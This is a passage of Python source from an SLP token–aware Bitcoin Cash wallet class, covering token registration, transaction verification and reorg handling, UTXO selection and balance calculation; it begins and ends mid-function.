is called on False return. The callback takes a single translated string
argument which is an error message (suitable for display to the user).
On success (True) return, this method ends up calling
self.add_token_type(), and also will end up saving the changes to
wallet storage if write_storage=True (the default).
This function is thread-safe. '''
token_name = token_name.strip()
token_id = token_id.strip().lower()
# Check for duplication error
d = self.token_types.get(token_id)
group_id = d.get('group_id', None) if d else None
if d is not None and not allow_overwrite:
if error_callback:
error_callback(_('Token with this hash id already exists'))
return False
for tid, d in self.token_types.copy().items(): # <-- must take a snapshot-copy here since we aren't holding locks and other threads may modify this dict as we iterate
if d['name'] == token_name and tid != token_id:
token_name = token_name + "-" + token_id[:3]
break
#Hash id validation
gothex = self._add_token_hex_re.match(token_id)
if not gothex:
if error_callback:
error_callback(_('Invalid token_id hash'))
return False
#token name validation
# if len(token_name) < 1 or len(token_name) > 20:
# if error_callback:
# error_callback(_('Token name should be 1-20 characters'))
# return False
new_entry = {
'class' : token_class,
'name' : token_name,
'decimals' : decimals_divisibility,
}
if token_class == "SLP65":
if group_id is None:
new_entry['group_id'] = "?"
else:
new_entry['group_id'] = group_id
self.add_token_type(token_id, new_entry)
self.save_transactions(bool(write_storage))
return True
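# Illustrative usage sketch (not part of the original code); token type 1 ('SLP1') is
# assumed and the token id below is a placeholder for a real 64-character lowercase hex
# SLP genesis txid:
#
#   ok = wallet.add_token_safe('SLP1', '<64-char lowercase hex token id>',
#                              'MYTOKEN', 8, error_callback=print)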
def add_token_from_genesis_tx(self, tx_or_raw, *, error_callback=None, allow_overwrite=True) -> SlpMessage:
''' Returns None on failure, optionally calling error_callback
with a translated UI-suitable error message. Returns a valid
SlpMessage object on success. In exceptional circumstances (garbage
inputs), may raise.
Note that unlike the other add_token_* functions, this version defaults
to allow_overwrite = True.'''
tx = tx_or_raw
if not isinstance(tx, Transaction):
tx = Transaction(tx)
def fail(msg):
if error_callback:
error_callback(msg)
return None
token_id = tx.txid()
try:
slpMsg = SlpMessage.parseSlpOutputScript(tx.outputs()[0][1])
except SlpUnsupportedSlpTokenType as e:
return fail(_("Unsupported SLP token version/type - %r.")%(e.args[0],))
except SlpInvalidOutputMessage as e:
return fail(_("This transaction does not contain a valid SLP message.\nReason: %r.")%(e.args,))
if slpMsg.transaction_type != 'GENESIS':
return fail(_("This is an SLP transaction, however it is not a genesis transaction."))
token_name = slpMsg.op_return_fields['ticker'].decode('utf-8') or slpMsg.op_return_fields['token_name'].decode('utf-8')
decimals = slpMsg.op_return_fields['decimals']
token_class = 'SLP%d' % (slpMsg.token_type,)
if self.add_token_safe(token_class, token_id, token_name, decimals, error_callback=fail, allow_overwrite=allow_overwrite):
return slpMsg
else:
return None
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text=None, save=True):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
if save:
self.save_labels()
return changed
def save_labels(self):
self.storage.put('labels', self.labels)
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do two constant-time set lookups rather than 2 x O(N) list lookups
# (the previous approach searched the address lists directly).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses it starts to add up, since is_mine() is called frequently,
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
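# Returns (is_change, index) for an address we own; raises if the address is not in this wallet.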
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
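# A tx reported at height 0 went back to the mempool (e.g. after a reorg), so forget any previous verification of it.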
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove the tx from the unverified map and add it to the verified map.
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified txs that are already mined
(height > 0) and therefore should be SPV-verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience wrapper around Blockchain.get_hash(height), except our
version returns None instead of NULL_HASH_HEX on a 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
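# mempool txs (height <= 0) sort after all mined ones via the 1e9 sentinel; mined-but-unverified txs sort by height as usual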
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
"effect of tx on address"
assert isinstance(address, Address)
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# subtract the value of coins sent from this address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
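# is_pruned: one of our inputs spends an output we have no txo record for.
# is_partial: some inputs are ours and some aren't, so the fee can't be computed from this wallet alone.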
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status = _('Partially signed') + ' (%d/%d)' % (s, r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
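# received: 'txid:n' -> (height, value, is_coinbase) for every output ever paid to this address.
# sent: those same 'txid:n' keys mapped to the height of the tx that spent them.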
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_slp_token_info(self, tokenid):
with self.lock:
return self.tx_tokinfo[tokenid]
def get_slp_token_baton(self, slpTokenId, cache=True):
with self.lock:
slp_txos = copy.deepcopy(self._slp_txo)
# look for a minting baton
for addr, addrdict in slp_txos.items():
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if txo['qty'] == 'MINT_BATON' and txo['token_id'] == slpTokenId:
try:
coins = self.get_slp_utxos(slpTokenId, domain = [addr], exclude_frozen = False, confirmed_only = False, slp_include_baton=True)
with self.lock:
val = self.tx_tokinfo[txid]['validity']
baton_utxo = [ utxo for utxo in coins if utxo['prevout_hash'] == txid and utxo['prevout_n'] == idx and val == 1][0]
except IndexError:
continue
return baton_utxo
raise SlpNoMintingBatonFound()
# This method is updated for SLP to prevent token-carrying UTXOs from being
# spent in normal (non-SLP) txns, or in txns for a token_id other than the one specified
def get_addr_utxo(self, address, *, exclude_slp = True):
coins, spent = self.get_addr_io(address)
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
"""
SLP -- removes ALL SLP UTXOs that are either unrelated, or unvalidated
"""
if exclude_slp:
with self.lock:
addrdict = self._slp_txo.get(address,{})
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
coins.pop(txid + ":" + str(idx), None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp
}
out[txo] = x
return out
""" SLP -- keeps ONLY SLP UTXOs that are either unrelated, or unvalidated """
def get_slp_addr_utxo(self, address, slpTokenId, slp_include_invalid=False, slp_include_baton=False, ):
with self.lock:
coins, spent = self.get_addr_io(address)
addrdict = copy.deepcopy(self._slp_txo.get(address,{}))
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
coins_to_pop = []
for coin in coins.items():
if coin is not None:
txid = coin[0].split(":")[0]
idx = coin[0].split(":")[1]
try:
slp_txo = addrdict[txid][int(idx)]
with self.lock:
slp_tx_info = self.tx_tokinfo[txid]
# handle special burning modes
if slp_txo['token_id'] == slpTokenId:
# allow inclusion and possible burning of a valid minting baton
if slp_include_baton and slp_txo['qty'] == "MINT_BATON" and slp_tx_info['validity'] == 1:
continue
# allow inclusion and possible burning of invalid SLP txos
if slp_include_invalid and slp_tx_info['validity'] != 0:
continue
# normal case: remove any txos that are not valid for this token ID
if slp_txo['token_id'] != slpTokenId or slp_tx_info['validity'] != 1 or slp_txo['qty'] == "MINT_BATON":
coins_to_pop.append(coin[0])
except KeyError:
coins_to_pop.append(coin[0])
for c in coins_to_pop:
coins.pop(c, None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
with self.lock:
tok_info = self.tx_tokinfo[prevout_hash]
x = {
'address': address,
'value': value,
'prevout_n': int(prevout_n),
'prevout_hash': prevout_hash,
'height': tx_height,
'coinbase': is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'token_value': addrdict[prevout_hash][int(prevout_n)]['qty'],
'token_id_hex': tok_info['token_id'],
'token_type': tok_info['type'],
'token_validation_state': tok_info['validity']
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
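# c = confirmed (mined, and mature if coinbase), u = unconfirmed, x = immature coinbase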
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
# if (isInvoice):
# confirmed_only = True
return self.get_utxos(domain=domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only)
def get_slp_spendable_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=True, confirmed_only=confirmed_only)
def get_slp_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=False, confirmed_only=confirmed_only)
def get_slp_token_balance(self, slpTokenId, config):
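# Returns a 5-tuple for the given token ID: (valid, unvalidated, invalid, unfrozen-valid, frozen-valid) token amounts.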
valid_token_bal = 0
unvalidated_token_bal = 0
invalid_token_bal = 0
unfrozen_valid_token_bal = 0
slp_coins = self.get_slp_coins(slpTokenId, None, config)
for coin in slp_coins:
txid = coin['prevout_hash']
validity = self.tx_tokinfo[txid]['validity']
if validity == 1: # Valid DAG
valid_token_bal += coin['token_value']
if not coin['is_frozen_coin'] and coin['address'] not in self.frozen_addresses:
unfrozen_valid_token_bal += coin['token_value']
elif validity > 1: # Invalid DAG (2=bad slpmessage, 3=inputs lack enough tokens / missing mint baton, 4=change token_type or bad NFT parent)
invalid_token_bal += coin['token_value']
elif validity == 0: # Unknown DAG status (should be in processing queue)
unvalidated_token_bal += coin['token_value']
return (valid_token_bal, unvalidated_token_bal, invalid_token_bal, unfrozen_valid_token_bal, valid_token_bal - unfrozen_valid_token_bal)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr, exclude_slp=exclude_slp)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def get_slp_utxos(self, slpTokenId, domain = None, exclude_frozen = False, confirmed_only = False, slp_include_invalid=False, slp_include_baton=False,
*, addr_set_out = None):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_slp_addr_utxo(addr, slpTokenId, slp_include_invalid=slp_include_invalid, slp_include_baton=slp_include_baton)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
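# frozen balance = (total including frozen) - (total excluding frozen coins and frozen addresses), per component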
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_slp_locked_balance(self):
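# Sums the BCH (satoshi) value sitting on unspent SLP token outputs -- funds that cannot be spent normally without burning tokens.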
bch = 0
with self.lock:
for addr, addrdict in self._slp_txo.items():
_, spent = self.get_addr_io(addr)
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if (txid + ":" + str(idx)) in spent:
continue
try:
for i, a, _ in self.txo[txid][addr]:
if i == idx:
bch+=a
except KeyError:
pass
return bch
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
